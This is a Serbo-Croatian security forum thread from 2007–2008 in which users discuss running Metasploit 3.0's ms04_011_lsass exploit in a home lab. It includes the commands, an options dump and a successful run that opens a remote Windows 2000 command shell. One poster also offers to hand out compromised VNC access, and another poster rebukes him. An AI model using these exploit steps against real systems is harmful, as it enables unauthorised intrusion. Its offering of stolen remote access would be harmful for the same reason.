Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Metasploit Framework 3.0

[es] :: Security Coding :: Metasploit Framework 3.0

[ Pregleda: 6709 | Odgovora: 11 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

S.S.T.
Damir Marjanovic
zaposlen
Tuzla

Član broj: 158725
Poruke: 17
*.ali.dlp362.bih.net.ba.



Profil

icon Metasploit Framework 3.003.10.2007. u 19:15 - pre 200 meseci
POzdrav,
Probavao sam neke exploite sa VMware-u i napadao drugi comp koji je umrezen sa ovim na kojem je VMware! Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!
Kasnije sam uzeo ovaj za admin pass (bilo mi je interesantno pa sam ga zato uzeo)! Isao sam ovim redosledom ali ne radi:
use windows/smb/ms04_011_lsass
set PAYLOAD windows/adduser
>> set

Global
======

No entries in data store.
Module: windows/smb/ms04_011_lsass
==================================
Name Value
---- -----
DCERPC::fake_bind_multi true
DCERPC::fake_bind_multi_append 0
DCERPC::fake_bind_multi_prepend 0
DCERPC::max_frag_size 4096
DCERPC::smb_pipeio rw
ENCODER
EXITFUNC thread
PASS metas
PAYLOAD windows/adduser
RHOST 193.154.0.3
RPORT 445
SMB::obscure_trans_pipe_level 0
SMB::pad_data_level 0
SMB::pad_file_level 0
SMB::pipe_evasion false
SMB::pipe_read_max_size 1024
SMB::pipe_read_min_size 1
SMB::pipe_write_max_size 1024
SMB::pipe_write_min_size 1
SMBDirect true
SMBDomain WORKGROUP
SMBName *SMBSERVER
SMBPass
SMBUser
SSL false
TARGET 1
TCP::max_send_size 0
TCP::send_delay 0
USER metas
WfsDelay 0

>> exploit

[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Server appears to have been patched
[*] Exploit completed, but no session was created.

Ne kreira mi uopste account metasploit prilikom logina!
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: Metasploit Framework 3.004.10.2007. u 00:04 - pre 200 meseci
Exploit completed, but no session was created.

Znaci msf je pucao exploit, ali nije probio :)

Sta da kucas u LHOST, LPORT itd? Hehe, ludilo..... msf nije toliko ITeligentan da cita misli, vjerovatno moras da mu zadas jos neke parametre, kao sto su portovi i ip adrese?
 
Odgovor na temu

S.S.T.
Damir Marjanovic
zaposlen
Tuzla

Član broj: 158725
Poruke: 17
*.ali.dlp491.bih.net.ba.



Profil

icon Re: Metasploit Framework 3.004.10.2007. u 00:16 - pre 200 meseci
Procititao sam ja sta pise, ali nije mi jasno kako je competed ako nije zavrsio ono za sta je namjenjen!
Sto se tice VNC-a pokusavao sam i podesavao ja LPORT i LHOST na razne nacine, ali...
Znam ja sta je L(ocal)HOST i R(emote)HOST tj. IP napadaca i IP zrtve! POdesim ja to kako treba!
Imam 2 compa koji su umrezeni i na ovom jednom je +VMware instaliran i na njemu je Metasploit framework i sa njega napadam ovaj drugi umrezeni comp, a ne onaj na kojem je install framework! Ta mreza radi kako treba!
Iskljucim ja i Firewall tako da nije do toga!

Ako ko koristi nekoliko exploita iz frameworka koji rade neka posalje (ako nije problem) i objasni sta sve treba da podesim da pokusam, jer meni ne uspjeva ovo sto sam izabrao! :(
Hvala!

[Ovu poruku je menjao S.S.T. dana 04.10.2007. u 03:07 GMT+1]
 
Odgovor na temu

m1k1
Beograd

Član broj: 146416
Poruke: 41
80.93.227.*

Sajt: m1k1.blogspot.com


Profil

icon Re: Metasploit Framework 3.004.10.2007. u 13:13 - pre 200 meseci
[*] Server appears to have been patched

Zar ovo ne govori dovoljno? Komp verovatno ima instaliran update koji krpi ovo rupu.

Inače ja sam probao na win2k serveru i radi, kao i ostali exploiti u metasploit framework-u.

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 2 opened (192.168.77.1:47460 -> 192.168.77.4:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.77.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\WINNT\system32>
"One machine can do work of fifty ordinary man. No machine can do work of one
extraordinary man."
 
Odgovor na temu

m1k1
Beograd

Član broj: 146416
Poruke: 41
80.93.227.*

Sajt: m1k1.blogspot.com


Profil

icon Re: Metasploit Framework 3.004.10.2007. u 13:20 - pre 200 meseci
A evo šta piše u opisu exploit-a vezano za XP
Description:
This module exploits a stack overflow in the LSASS service, this
vulnerability was originally found by eEye. When re-exploiting a
Windows XP system, you will need need to run this module twice.
DCERPC request fragmentation can be performed by setting 'FragSize'
parameter.

"One machine can do work of fifty ordinary man. No machine can do work of one
extraordinary man."
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: Metasploit Framework 3.004.10.2007. u 21:56 - pre 200 meseci
Kralju, svaki exploit u MSF-u RADI! Problem je do tvoj patchovanog sistema. Gledaj to ovako: Pucas u covjeka iz pistolja, jesi ti ispalio metak ali nisi mu probio pancir. Uzeo si preveliki zalogaj :)

pa dje si m1k1 h4x0ru :)
 
Odgovor na temu

jovica016
Jovica Ilic

Član broj: 94502
Poruke: 202
91.150.101.*

Sajt: www.jovicailic.org


+10 Profil

icon Re: Metasploit Framework 3.005.10.2007. u 19:02 - pre 200 meseci
Citat:
S.S.T.: Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!


Ako ti za prvih 2 sekunde kad vidis LHOST, RHOST, RPORT,... ne skapiras sta je sta, onda nemas sta da trazis u exploatisanju sistema. Prijateljski savet. Pozdrav.
 
Odgovor na temu

S.S.T.
Damir Marjanovic
zaposlen
Tuzla

Član broj: 158725
Poruke: 17
*.ali.dlp453.bih.net.ba.



Profil

icon Re: Metasploit Framework 3.006.10.2007. u 00:41 - pre 200 meseci
MA jovice ma skapirao sam ja to nego nece i nece! Pokusao sam sa drugom verzijom XP-a posto je ova zadnji "krik" WinXP-a i do toga je!
Hvala svima na pomoci!
 
Odgovor na temu

jovica016
Jovica Ilic

Član broj: 94502
Poruke: 202
91.150.101.*

Sajt: www.jovicailic.org


+10 Profil

icon Re: Metasploit Framework 3.006.10.2007. u 16:41 - pre 200 meseci
Ok, kako ti kazes.


Pozzz
 
Odgovor na temu

e wiZz
verisign

Član broj: 154129
Poruke: 36
89.146.178.*



Profil

icon Re: Metasploit Framework 3.002.02.2008. u 22:04 - pre 196 meseci
pa LHOST ti je ip lokal hosta kojim otvaras komand shell,RHOST(valjda znas) je "zrtvin" IP.
sto se tice VNC imas mali programcic potrazi na milw0rmu...koristio sam ga par puta,zaista radi....ako zelis imam ja dosta vncova pa ti mogu dati da se zabavljas :D
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: Metasploit Framework 3.006.02.2008. u 11:14 - pre 196 meseci
Citat:
e wiZz: pa LHOST ti je ip lokal hosta kojim otvaras komand shell,RHOST(valjda znas) je "zrtvin" IP.
sto se tice VNC imas mali programcic potrazi na milw0rmu...koristio sam ga par puta,zaista radi....ako zelis imam ja dosta vncova pa ti mogu dati da se zabavljas :D


Tebe bih odmah banovao i zabranio ti internet do kraja zivota. Ti si bruka i sramota za citav ITSec svijet.
razlog: http://infected.blogger.ba
 
Odgovor na temu

Mitrović Srđan
bloodzero
Freelance
Majur //: Šabac

Član broj: 10261
Poruke: 2800
212.62.47.*

Sajt: freeshell-reviews.com


+4 Profil

icon Re: Metasploit Framework 3.006.02.2008. u 16:16 - pre 196 meseci
Strasno ali strasno...ja sam mislio da su ovakve stvari davno izumrle.
Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!


 
Odgovor na temu

[es] :: Security Coding :: Metasploit Framework 3.0

[ Pregleda: 6709 | Odgovora: 11 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.